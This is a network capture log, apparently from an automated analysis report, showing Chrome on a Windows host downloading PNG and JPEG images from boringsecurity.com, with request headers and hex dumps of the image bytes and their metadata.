                                                                          2023-12-10 16:44:49 UTC791INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 c4 00 00 05 7e 08 03 00 00 00 65 5c 5f 68 00 00 03 00 50 4c 54 45 a0 60 2f 01 01 01 36 20 25 65 8c 5a 4f 2d 16 02 2f 1c 01 58 37 32 58 30 80 54 60 5f 3e 29 5a 34 14 83 55 35 16 0b 12 09 33 1b 0f 1a 18 10 38 1b 41 82 35 00 4a 36 16 3d 1c 71 b8 17 54 38 22 6c 3d 1b 0b 05 02 00 2a 1a 00 53 34 00 35 2b 2b 18 09 3a 7e 36 07 5c 37 13 0c 04 0d 06 0b 5c 13 02 46 85 36 35 7a 37 77 bb 27 23 14 09 5f 54 27 32 76 36 00 24 1c 23 6b 38 01 4e 30 47 80 38 34 17 1e 2c 6e 39 06 58 31 00 47 2e 1b 10 08 02 0a 06 00 3e 2a 0b 5f 37 01 23 15 00 3e 31 1c 67 37 06 04 08 21 69 34 6b 40 24 03 37 20 00 1b 17 40 24 0e 71 38 15 95 59 2b 17 64 37 2e 72 38 b3 92 33 48 26 10 00 2c 27 41 7b 38 37 1c 09 55 82 2f 18 5f 32 34 73 3a 20
                                                                          Data Ascii: PNGIHDR~e\_hPLTE`/6 %eZO-/X72X0T`_>)Z4U538A5J6=qT8"l=*S45++:~6\7\F65z7w'#_T'2v6$#k8N0G84,n9X1G.>*_7#>1g7!i4k@$7 @$q8Y+d7.r83H&,'A{87U/_24s:
                                                                          2023-12-10 16:44:49 UTC2372INData Raw: 93 9b c2 2c 94 5f b1 e7 9b fe a4 fe 49 95 9d a6 d4 74 61 f0 59 0e 00 07 ff ff 49 44 41 54 78 da e4 9d bd ab fb 54 18 c7 fd f6 0a 15 09 57 04 51 22 98 45 e9 d0 c1 23 96 0c 75 32 38 64 0a 08 4e 57 e8 50 88 28 ba d8 d0 4e 82 83 93 38 48 09 c9 20 1a 24 0a 92 b1 93 20 ad 74 e8 26 bf bf 40 10 41 70 70 f0 7f b0 a7 e7 34 4f ce 4b da d4 5e 2f 8a 4f df f2 9e 36 f7 e4 9c cf f9 3e cf 73 ee 63 61 dc e3 b6 7c 42 b5 85 03 3f ee d5 e6 01 be c7 cd 09 9d 30 74 84 f9 70 7a 87 69 0f 90 8b 42 b9 fd a2 71 a8 8d ef c7 2b f5 e8 3d e4 fd 7e 56 dd 3c 94 65 c8 6e fe ad f6 e8 3b 6e 19 92 47 fa 9a b4 e8 b7 db 1c 81 6b b5 00 2c eb 73 2b bf 13 46 c7 ed 64 69 df b4 a2 3c bf 57 c2 30 c9 ea 3d d2 cb 4e 5a dd 01 9e 8f c8 3d 1a 43 7a 53 62 ec 5a 6c 80 9c 56 fc 33 36 da 3f f6 4f 6e c1 14 80
                                                                          Data Ascii: ,_ItaYIDATxTWQ"E#u28dNWP(N8H $ t&@App4OK^/O6>sca|B?0tpziBq+=~V<en;nGk,s+Fdi<W0=NZ=CzSbZlV36?On
                                                                          2023-12-10 16:44:49 UTC538INData Raw: 2d 9e 7f 7c 9f d1 cd 16 ba e2 22 1c 40 1a e0 ab 2c 23 c6 bb b7 16 22 e5 bf 38 c1 94 8b 9c 41 20 bd c9 24 5d d2 45 56 2f e2 af da 4a f9 a6 ce c8 89 01 e6 27 3a 67 7b 79 b0 9f b1 29 f5 e3 3a d5 15 73 3c ab eb 70 c4 5e ab 10 9b 27 d6 82 52 3c b5 1b a2 ec 10 c2 a1 23 58 8b 6b cf df b4 30 dc ae 8e 26 80 6b 83 38 e6 9b 45 7f 89 a9 58 6b 23 39 5a 71 5a 82 73 8f 53 a4 dc 09 39 4e 84 c4 5d 78 4f 3b ca 8d d9 43 20 d0 cd 70 a6 8a 33 8d e1 35 02 a7 b6 0e 0b ae a0 2a f9 41 ec 66 5b 7f 6f 42 5c 27 6f ea 4c 10 ea c2 cf ce dd 46 09 72 4d 46 28 e6 cf ce f7 15 c8 a3 47 8f b8 22 b7 c7 b8 ea ef df a2 45 55 a6 07 2b 8b 36 29 ce 6b 20 d5 d6 47 97 6b c0 d5 c8 a1 ad aa 5d 3b 54 b5 13 a7 85 18 b8 4d 25 2e 34 20 ce f1 37 3b a5 34 c1 23 88 e3 54 d7 90 e2 f6 d4 16 0a 9c e3 08 c7 ad
                                                                          Data Ascii: -|"@,#"8A $]EV/J':g{y):s<p^'R<#Xk0&k8EXk#9ZqZsS9N]xO;C p35*Af[oB\'oLFrMF(G"EU+6)k Gk];TM%.4 7;4#T
                                                                          2023-12-10 16:44:49 UTC4744INData Raw: b2 19 43 cf 50 37 d6 1e 5c 83 dd d4 80 38 42 b8 3d 50 13 c1 11 b2 1d 0f d0 8c ad 3d 6e a1 07 ef 77 4f 4e 95 16 23 20 25 4e 89 de 15 16 49 08 98 9d 4b 4d 25 2a 0b ec 61 71 f6 3c 07 ca 6b 50 a2 e6 ae b7 8b bc a9 4f ec 4e 42 5c 4a fe d4 82 96 66 cf b2 8c 37 83 d2 6e f2 17 5f ae fe 2e c4 95 e7 c7 8f 00 e2 66 2a 69 47 87 6a 84 d8 14 9c f5 fc d4 05 f9 d6 89 9f 6d 10 b7 45 bc da 29 a5 c9 57 20 8e b4 38 e1 46 15 52 9c 74 a8 f2 4d cc 2e fb 2a 46 bc 52 33 1b ee 85 aa d2 92 d2 c6 5a b7 a9 c4 1f f5 61 a4 b8 34 9f e7 04 a7 17 40 dc 0d 26 76 05 ab b0 32 5c 4b 7e 10 b9 53 fb 8f 24 c5 89 82 fb 37 65 81 92 26 4f 5d 41 99 dd 6d 85 b8 b4 50 7f 56 0e e0 c8 2e 0d 88 83 1a c2 c1 58 79 93 de c1 92 d7 80 8c 4d 4f a4 35 90 3f d5 26 c5 a9 8e 55 ca 4e 95 3a 5c 30 3d e1 46 bd 8d e0
                                                                          Data Ascii: CP7\8B=P=nwON# %NIKM%*aq<kPONB\Jf7n_.f*iGjmE)W 8FRtM.*FR3Za4@&v2\K~S$7e&O]AmPV.XyMO5?&UN:\0=F
                                                                          2023-12-10 16:44:49 UTC5930INData Raw: 85 f5 84 91 55 65 59 5d a5 58 c7 a7 6a 7e d1 25 10 c7 e9 ca 0c 2f c0 a9 ff f8 6f 7a e2 e1 87 ef 6f 21 ee 49 f0 4c 68 f3 f8 30 07 ac 29 4c 54 6b 14 04 b9 a0 63 ea 56 96 df 9e 3b 68 22 94 60 cc 7e 50 ae 78 3f e9 04 0d 46 ec d9 d4 18 dc c5 60 36 f5 e0 fa 96 a6 06 cc fd 60 7d 9b 25 0c 63 d5 55 b7 7c 37 0d 48 fc ca cb 24 58 d6 f7 78 af fc ce 08 8e 0b 71 2c a5 ca 6e 8f 2c 5b 3b df c0 75 e2 40 4e ad 4e 4f a2 dc b9 2e 71 bc ed e3 28 77 0f 4d d5 3a 38 54 e2 08 c4 9a 10 c7 b6 a3 08 d7 89 71 43 09 55 7b 55 9c 31 57 f5 82 2e 55 ec aa b5 32 9c 62 7b ee 92 fb 46 41 dc 15 88 48 e5 e5 74 b4 11 e4 e5 63 a4 f8 89 c6 d5 6a 4f 26 40 fa 31 37 b0 41 dc 5e cd a7 22 16 c6 a8 ec 59 21 6e 02 eb 83 bc 56 28 3e 71 18 7e db d9 80 21 aa e2 a4 fd 0e ea 13 4f 1a 88 0b 4f 5d f5 9a 4e 86
                                                                          Data Ascii: UeY]Xj~%/ozo!ILh0)LTkcV;h"`~Px?F`6`}%cU|7H$Xxq,n,[;u@NNO.q(wM:8TqCU{U1W.U2b{FAHtcjO&@17A^"Y!nV(>q~!OO]N
                                                                          2023-12-10 16:44:49 UTC7116INData Raw: 0e 6b e0 c4 13 9b e7 52 11 c6 0e 24 3e 54 e4 f4 c9 aa 9d 10 cc 54 aa 8e 15 5c 8a 8b 44 4d 1c 42 dc 01 31 6f fc b9 47 43 5c bc 17 7c 22 63 7d 9d 7a 50 a0 c4 e1 c6 c2 ac 56 5e 47 8a 95 8c e8 43 96 6a e2 82 88 dd af 5b 81 e0 a9 17 0c a3 38 8c 1c e2 d0 62 c4 75 b8 14 67 cb a7 8a 2f 1e e5 6f cd a4 90 5c 08 e4 c3 17 12 1c 6b 20 37 8c cd b3 d1 01 03 76 91 1c 61 2c 12 9b 5d a3 b8 53 b5 c4 38 9f 63 4b b0 fa e4 e8 71 b9 49 46 a2 a9 fc 1f 19 33 3e 4d 13 6e bc de 51 cb 45 d1 4e b1 0f 40 71 60 b7 42 ff 72 c7 dd 8e 38 c3 69 b5 0a 1d 80 43 3a 19 10 e2 9c a8 38 81 b7 8a 3c 84 b8 06 31 45 27 cb 82 f0 b3 79 46 cb 65 92 0d 8f 45 e9 4d cf 9b 2a 3a 1c 1a 8a 54 56 c2 e1 68 86 43 11 0e 3d 45 aa a2 23 f1 30 1e 40 0d 84 b8 00 20 68 34 d7 74 c7 06 7a 3f d2 26 45 4e f9 19 70 a6 fd
                                                                          Data Ascii: kR$>TT\DMB1oGC\|"c}zPV^GCj[8bug/o\k 7va,]S8cKqIF3>MnQEN@q`Br8iC:8<1E'yFeEM*:TVhC=E#0@ h4tz?&ENp
                                                                          2023-12-10 16:44:49 UTC8302INData Raw: 2f 1c e1 88 a1 c4 85 e0 54 31 1c 53 4d f1 76 d4 c0 9f 71 c7 16 1a 67 3d ea 62 98 4a 52 91 4c 8c 9b 4d 7b 41 1c 5e a2 12 c7 a7 28 97 89 70 7e c8 06 dc ff 1c 09 ee 38 84 3b 07 80 f7 a4 3b 04 c4 59 b9 ad 5a 88 0b 2c 6d 0d dd 0a 21 ae d5 6c 88 c2 8a 27 53 29 c0 89 74 6a 6f e8 45 da 08 fc b5 96 d6 71 61 86 10 d7 a8 3d 35 22 67 19 c3 0d 01 4d 75 d4 71 0d e6 04 e8 65 c3 75 30 21 74 33 34 af 78 d6 5c 2e 2b 4b ac 94 b7 b0 4d 14 5d cc d1 48 ae 89 69 c8 f1 bd 0f 44 83 38 dd bd f2 53 5a 3e 35 dc fb 03 7f 51 6e 4f 45 60 3d 22 e2 f9 18 d2 bd 90 49 e6 2a 01 f3 7c 2d 02 2f 17 e2 ec b9 c8 d2 2e 9c 42 21 ce 51 d7 0f 0f ba 85 a3 de b6 6e 90 e9 59 f8 6c 35 59 0f bd ba d1 07 b7 e8 98 db e4 46 3d f9 53 9f bd 7a f7 ee e9 b9 f7 82 d6 c5 e9 18 77 1b 2a 0e 23 fc c2 83 d6 6c 36 db
                                                                          Data Ascii: /T1SMvqg=bJRLM{A^(p~8;;YZ,m!l'S)tjoEqa=5"gMuqeu0!t34x\.+KM]HiD8SZ>5QnOE`="I*|-/.B!QnYl5YF=Szw*#l6
                                                                          2023-12-10 16:44:49 UTC6118INData Raw: b9 f3 17 24 11 ee 3e 41 b8 cf 3c 44 08 ee e6 a7 6e de 7c e8 e6 43 0f dd bc f9 a9 8b 17 77 08 ce 11 9a 93 d5 39 db 11 8e a9 c1 ac ba 00 9a 26 20 d1 d3 56 8e e4 a9 5e cb 39 69 08 05 8e 7b 91 03 4e 1d a2 63 28 49 2d 03 a8 75 b9 e5 2f 83 b8 8c 19 f8 ba d3 3e 28 4a 9c 5e 0f 36 11 26 6f d9 ae 36 05 12 27 79 73 78 b3 15 88 b3 11 e2 90 0d 65 c7 1f 3c 42 51 44 ae 80 13 0d 92 5f 3b b6 a7 b6 e6 31 44 4a 32 3b 18 88 c3 2e 92 10 17 11 83 19 3d ed 4b ae c1 ed 97 c3 57 a6 12 57 d5 1b 0d b0 24 ce a0 c4 69 93 b6 c6 1d 83 23 9f cd 09 8e e9 70 f4 1a 2f 6d d9 de ba 6c 1a b1 6c d1 e3 05 60 8d 79 45 3b 2a 71 5e 3a c1 1d 4e 46 c2 a0 8d 62 d9 1c ff 13 11 0e ae 7e fe 81 22 dc 25 17 9c 4a 75 23 0e 5c d2 73 41 1c 07 3e 55 8f 7b 82 8b 79 32 c3 79 0a 2f 05 69 42 9c 6d 1d ab ad 61 ec
                                                                          Data Ascii: $>A<Dn|Cw9& V^9i{Nc(I-u/>(J^6&o6'ysxe<BQD_;1DJ2;.=KWW$i#p/mll`yE;*q^:NFb~"%Ju#\sA>U{y2y/iBma
                                                                          2023-12-10 16:44:49 UTC10674INData Raw: 48 73 43 da 6a 10 c1 32 83 b8 ef 6c 89 f3 19 4e f2 66 d5 22 ae 0d e8 1b c9 89 89 c9 73 5e 90 8b dc 16 8e 00 20 48 53 e1 2c 9b 73 25 56 c2 59 97 d8 ea 83 7b 48 b3 10 d7 34 9a c4 95 8d 04 84 af c8 1a 4a 70 73 76 a9 56 af 5f 7f ed bd 37 ae d3 d6 06 f0 fd 78 91 45 8a 5b b2 77 db a4 ab f2 c0 34 55 b5 b1 d9 80 73 cf 3d f7 dc c5 cf 7d 76 bd b8 7b b5 f6 da 9f 68 fc f9 de 1b ef bc 57 a7 db ad 25 38 cc 70 fa 15 db 1a 9c 28 e4 ba 51 fc c7 b6 e6 15 e2 cc 1e 1a 61 e4 43 0d 49 4d 7c c4 e9 8c 25 51 91 d8 e8 33 18 d8 e1 50 3d 1b 1f a6 50 b4 28 39 10 7e 58 25 b1 be be 42 09 0e 9c 06 21 38 12 04 df 9e 7a ea 85 17 28 bf d1 f8 ea 4b 5f 8d 76 57 b7 1e fe d2 93 97 59 35 1c 13 e1 2e 9f 3a 7f 2e 46 b8 2f 1e d0 b8 4d 19 4e 53 e2 76 d6 00 7e 4d 28 ee 8f 1f 07 d8 bd bd c3 39 8e 5e
                                                                          Data Ascii: HsCj2lNf"s^ HS,s%VY{H4JpsvV_7xE[w4Us=}v{hW%8p(QaCIM|%Q3P=P(9~X%B!8z(K_vWY5.:.F/MNSv~M(9^


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          85192.168.2.54981675.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:49 UTC634OUTGET /images/steel.jpg HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/_next/static/css/ad4aef9984e4c1fd.css
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:49 UTC396INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 35 30 39 32 33 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 31 30 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 34 39 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 63 61 39 37 63 30 31 31 33 38 61 34 35 39 62 37 38 38 64 31 38 34 34 64 39 65
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 50923Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 271024Content-Type: image/jpegDate: Sun, 10 Dec 2023 16:44:49 GMTEtag: "ca97c01138a459b788d1844d9e
                                                                          2023-12-10 16:44:49 UTC790INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 28 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 37 2e 31 2d 63 30 30 30 20 37 39 2e 39 63 63 63 34 64 65 39 33 2c 20 32 30 32 32 2f 30 33 2f 31 34 2d 31 34 3a 30 37 3a 32 32 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                          Data Ascii: ExifII*Ducky(http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.9ccc4de93, 2022/03/14-14:07:22 "> <rdf:RDF
                                                                          2023-12-10 16:44:49 UTC2372INData Raw: 36 2d 34 65 34 37 2d 39 34 30 31 2d 32 32 33 36 66 31 61 37 62 61 35 38 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 64 31 34 30 63 35 33 37 2d 65 65 35 30 2d 34 61 34 36 2d 62 33 34 65 2d 65 61 30 64 32 33 64 61 31 33 36 39 22 2f 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e ff ee 00 21 41 64 6f 62 65 00 64 c0 00 00 00 01 03 00 10 03 03 06 09 00 01 15 94 00 01 58 04 00 04 22 ae ff db 00 84 00 0c 08 08 08 09 08 0c 09 09 0c 11 0b 0a 0b 11 15 0f 0c 0c 0f 15 18 13 13 15 13 13 18 17 12 14 14 14 14 12 17 17 1b 1c 1e 1c 1b 17 24 24 27 27
                                                                          Data Ascii: 6-4e47-9401-2236f1a7ba58" stRef:documentID="adobe:docid:photoshop:d140c537-ee50-4a46-b34e-ea0d23da1369"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>!AdobedX"$$''
                                                                          2023-12-10 16:44:49 UTC538INData Raw: 67 69 c8 25 80 26 4a 34 38 28 a2 1a 90 be 74 55 4a 3b 49 d0 31 70 05 e9 a2 aa 28 12 0b e9 cf a1 58 a2 36 c5 b3 46 b9 83 a7 2d d4 9e 92 95 16 15 af 89 5d 25 19 b9 0b 8c 74 8a 0a 30 75 63 1d fa 70 b2 89 c7 3e bc fa 14 75 e6 4e d8 9f 57 9b 1e 93 90 77 dc ba 8d 73 b3 68 0f 40 27 21 a3 a5 ea 2c c1 ab 95 17 9e 45 d4 e3 a3 29 d6 4c 4d 18 aa 28 52 81 30 54 c1 d3 b7 97 d0 43 30 77 dc e8 d1 7c cb 95 09 d8 d3 b1 78 ee 55 b4 79 f7 59 26 b9 85 11 d4 e6 75 e4 76 22 8d 84 a8 d2 33 60 f2 be 66 32 4c f5 e6 1a 52 d8 a0 da 47 4e 2f 9c 05 cf 3b 0e 93 26 2b 88 df 2e 82 89 ca 6a 4a d3 46 c4 1d 7c bb a9 14 63 4d 04 ee 9c 46 68 2b 9d c9 06 c3 1b 00 61 c6 2e fc fd 06 2b 81 b2 18 eb 07 32 a4 84 83 d0 72 0e 93 cf a1 b4 d9 cf 6e 67 59 71 cf 9d 86 e9 a8 04 00 0a 2a 03 6c 38 c6 a9 c7
                                                                          Data Ascii: gi%&J48(tUJ;I1p(X6F-]%t0ucp>uNWwsh@'!,E)LM(R0TC0w|xUyY&uv"3`f2LRGN/;&+.jJF|cMFh+a.+2rngYq*l8
                                                                          2023-12-10 16:44:49 UTC4744INData Raw: e5 ae 08 40 e9 8c 53 29 cf 97 6f 39 db 1d 03 9f 6e 04 dc 48 0c 0c 75 83 9d ca 1e 8e 74 6e 77 01 a7 19 9c 75 e7 d7 99 b6 93 4f 4e 60 b0 3b 02 54 8c 5c 8c de 27 54 85 32 14 c1 b8 f6 83 2a 21 44 45 49 43 cc da b1 32 c9 b3 8c e0 be 9c 68 76 c4 94 9c f5 62 0b c4 ea 83 54 25 46 90 bd 64 6a 0c 29 0e 03 21 ae 68 d9 93 6d 82 a6 8c 20 92 1d 1e 70 77 39 a5 61 16 41 8a c6 4a 2a 5a 0a 28 c6 4a 0b 24 b9 36 71 a3 a4 93 b4 9d 59 b3 18 14 43 56 0d b0 bc d2 aa 3b 1b 95 63 59 8b c2 02 04 d0 6e 9c 7d 04 e4 1b 8a 29 03 32 9d 77 3e 84 85 94 c8 74 ae 34 77 e5 72 6b e7 45 71 eb 03 7c fa 06 3a 9e 6b 84 ef 90 ed 5c a8 be 1d e4 8e fc 83 58 16 21 8a a2 7a 48 75 e5 da 0a ed c3 a1 71 49 0e 0b 0e 85 b3 44 6e 7c ce f3 72 4f 58 c7 7a e7 d0 cf 2e a6 10 eb db cd d8 a3 04 5f 3e 87 3e 9c ec
                                                                          Data Ascii: @S)o9nHutnwuON`;T\'T2*!DEIC2hvbT%Fdj)!hm pw9aAJ*Z(J$6qYCV;cYn})2w>t4wrkEq|:k\X!zHuqIDn|rOXz._>>
                                                                          2023-12-10 16:44:49 UTC5930INData Raw: 8d 35 01 71 d0 0c 09 34 03 8d 35 81 90 9a ac 02 91 ce c3 8f a6 50 c6 20 e9 cc 28 a3 5c a7 3e 88 49 50 4c dc 9a e2 ca 19 39 f6 89 28 d2 5a c9 a3 9c 15 d7 87 60 74 8c e4 9e 93 64 8a 24 e2 89 a3 66 4c 01 52 07 6e 78 07 62 cd 25 4e 41 31 4c 20 89 3a 82 73 06 4a 2f 45 93 a3 1d 27 24 59 45 c6 c2 a1 8e 90 43 38 bd 34 5e 9a 04 a3 0e 36 43 0a 46 a0 97 61 b0 14 4c 20 ce c5 5c e1 63 1b a7 3a 1a 84 a2 71 b6 83 ad 45 95 a6 4b d2 82 e2 2f 50 54 25 c5 49 5a 28 72 15 ae 0b 35 05 18 ad 09 d0 8c 37 09 5c d4 c5 51 15 93 0c 14 5e 1b 84 d1 d6 05 d8 d4 50 54 a6 35 11 74 85 c6 2e f9 d0 93 41 36 9c fb 96 41 b1 d0 90 bb e3 64 54 25 54 75 26 f5 1c 6d 03 3c 0a 66 8e d5 c7 a1 a7 88 7a b9 45 9c 7a eb 3b 47 2e 84 f4 94 63 bc 1c 58 0e fc e2 ce db 9d 98 42 f6 09 72 3c f2 41 72 41 52 55
                                                                          Data Ascii: 5q45P (\>IPL9(Z`td$fLRnxb%NA1L :sJ/E'$YEC84^6CFaL \c:qEK/PT%IZ(r57\Q^PT5t.A6AdT%Tu&m<fzEz;G.cXBr<ArARU
                                                                          2023-12-10 16:44:49 UTC7116INData Raw: 72 3c fa 49 0d 62 69 92 65 45 d8 dc ee 4e 7b 25 33 87 9d 49 b6 c1 99 37 5e 56 4d 4e 0c 83 a5 19 a9 2f 60 22 a8 e7 b6 1c 61 28 33 83 69 a0 66 8a c6 02 51 9c 0f 37 14 6a 31 38 ae 9c ac da 13 a4 80 f2 eb 26 4c 6c 86 c2 62 a4 b8 41 9a 90 b9 40 31 49 86 54 8c c9 5b 02 69 34 ea 1a 90 9a 31 d2 4b 26 76 36 41 d9 36 d8 97 61 c8 5c e0 8e b0 1d 23 a4 9a e2 8c 64 11 33 b1 52 84 f4 e7 8a 97 05 4a 56 11 c0 57 3a a2 5a c4 1d 43 6b 82 1b 0d 53 87 09 4c a5 28 61 09 c6 2a 6e 4e 90 07 44 93 a6 e4 97 5c e8 12 c4 b0 86 83 5f 2a 1c a7 23 a4 95 51 d0 4b 92 5c 15 0e 35 f3 a3 a1 ce cc a1 3b 60 a9 b2 67 d3 c0 ad ce 8b 0a 11 a3 93 40 88 49 52 74 66 0e d3 b9 9d 18 b2 3a 72 b2 b0 8d f1 c7 47 9d 1b 21 ba 71 ea 56 9e 84 73 c0 17 25 e4 36 c9 19 c6 b2 4e b8 83 9d 12 77 e5 76 73 e9 ce c4
                                                                          Data Ascii: r<IbieEN{%3I7^VMN/`"a(3ifQ7j18&LlbA@1IT[i41K&v6A6a\#d3RJVW:ZCkSL(a*nND\_*#QK\5;`g@IRtf:rG!qVs%6Nwvs
                                                                          2023-12-10 16:44:49 UTC8302INData Raw: 08 ce 04 28 04 36 d8 58 b2 68 4d 70 9b 18 32 84 b2 58 05 98 34 d6 36 d2 56 64 1d 8c 6c 38 4c 38 71 84 c9 cb 6c 64 4d b6 0c 85 02 0e c6 d9 0c 86 c6 2f 18 74 26 72 2c a6 2a 42 6e 4b a8 a1 35 06 40 32 38 92 f4 a3 2e 35 ca 39 40 70 2c 95 b4 1a 70 56 c1 aa 71 71 61 a8 4c a0 ed 8d 34 19 d8 61 43 68 2f a7 1e 86 29 04 a0 87 18 ac 0e 0a e7 da 0e 5d 50 6a 53 45 01 d2 12 a6 a4 d3 58 c2 8c 74 90 d6 11 d3 9d 17 84 95 c4 c5 74 38 5e 41 68 9c 86 a8 4d cf a6 21 84 b6 12 a5 0c 96 61 4d 8b 27 08 14 14 4d 11 65 01 a8 07 12 81 d2 b9 d0 ee 58 a6 6c 59 a3 64 39 73 ef cc bb e7 d0 db 63 17 24 86 29 99 2d 84 c1 44 75 e7 65 85 01 40 28 6d 82 60 c5 48 9b 68 3a f3 e8 1c fa ec 67 21 9c 13 d3 99 9c 15 15 89 cc 0f 5f 2f a0 0b c4 56 4d 15 01 a9 22 b0 69 e9 8e 5b a4 8a 50 4d 49 2c f5 1e
                                                                          Data Ascii: (6XhMp2X46Vdl8L8qldM/t&r,*BnK5@28.59@p,pVqqaL4aCh/)]PjSEXtt8^AhM!aM'MeXlYd9sc$)-Due@(m`Hh:g!_/VM"i[PMI,
                                                                          2023-12-10 16:44:49 UTC6118INData Raw: 8b ad 70 6a fe 87 bb 15 89 98 3e a5 e1 2e 96 a2 d5 b4 f5 36 d6 cd 7e 90 c4 ec 6f 54 27 97 56 db 2e c4 6c 9d d6 53 2f 1e 62 d2 b1 14 a2 cf f4 ff 00 fa 0b 5c 0b bb b8 46 45 a9 54 24 60 ee 30 53 10 b5 4c a1 35 1d ab 55 65 b3 2e 2f 0b b7 43 3c 9e cc de 4d 75 57 83 e4 f4 b2 d3 19 68 b3 e8 74 a3 b2 e9 27 66 db e7 df ad 96 cf 61 14 d2 d9 26 b4 d7 5d 07 0d aa 6d 24 6e 74 bf cd 59 b7 cf ce e6 cb 19 bf f3 d3 67 aa d5 a3 6d 76 4b f6 42 d9 96 5d 8d 6e 2d 4c 1d 3e c6 a1 37 1a a6 b6 4b 3b 6a c5 54 8b 4c 6e df 7b 3f e4 f7 4f 67 b3 d4 77 b6 c9 b3 03 79 c3 11 46 b4 7c e6 b3 b6 bb 23 64 a9 6a cb 7f 36 3a 2d 31 f4 bf 8a 62 1e 51 d1 62 a1 c5 50 d2 67 42 b3 56 32 8a 3d b1 cf ce 68 ac e2 19 89 c3 29 4a 3a 86 64 a1 0e 52 e2 e2 a5 a9 b5 50 d9 74 60 bb 9b ce ce a3 7b 4e e1 28 a5
                                                                          Data Ascii: pj>.6~oT'V.lS/b\FET$`0SL5Ue./C<MuWht'fa&]m$ntYgmvKB]n-L>7K;jTLn{?OgwyF|#dj6:-1bQbPgBV2=h)J:dRPt`{N(
                                                                          2023-12-10 16:44:49 UTC10674INData Raw: 59 93 0d dd 26 c4 d8 d8 ac 67 f6 d7 11 56 22 f2 f6 1b a3 e9 99 67 be 0d 31 42 d8 f5 45 3b 6a 16 11 83 67 81 d0 d3 8b a8 c1 a2 4a 3a 3b 30 5c 31 a2 a3 a2 8b 3b 17 ea de 5e 22 8a 2b 02 45 15 45 73 50 a9 8d 2f c4 f4 29 94 2c 42 65 c5 70 ed d0 cc 96 22 f8 7a 3f c3 83 d7 92 b8 b3 a1 d4 78 a8 b1 8b a3 d6 cd b6 75 4d 1f 7f ad b1 7f 24 dd d8 f2 78 87 4c 48 ca 3d ec fe 46 ae 1d 95 9c 8f a3 fa ac 18 ae c4 75 1f d8 ac 7c 23 f5 d4 fa 63 ef 2c 69 99 18 8d d3 5b 78 21 0f b7 93 07 ac 7f 34 da 7a cd 1d cf cd af 9d f5 d9 b3 b3 58 5b 52 f9 a1 24 35 1f 4d 0b 61 d3 1a 66 12 ea 3e 95 bd d9 a3 43 c1 a3 b5 ae 95 b6 0b a2 e8 79 1e b6 55 1d 46 db 1f 25 d1 93 e9 a2 ed fd 65 3b 4c 66 d5 49 aa f0 f3 25 64 a1 0e 86 d2 86 f1 5c 57 59 1b 55 42 bb ed da 19 aa ce dd ef 68 d7 1a ad f6 f9
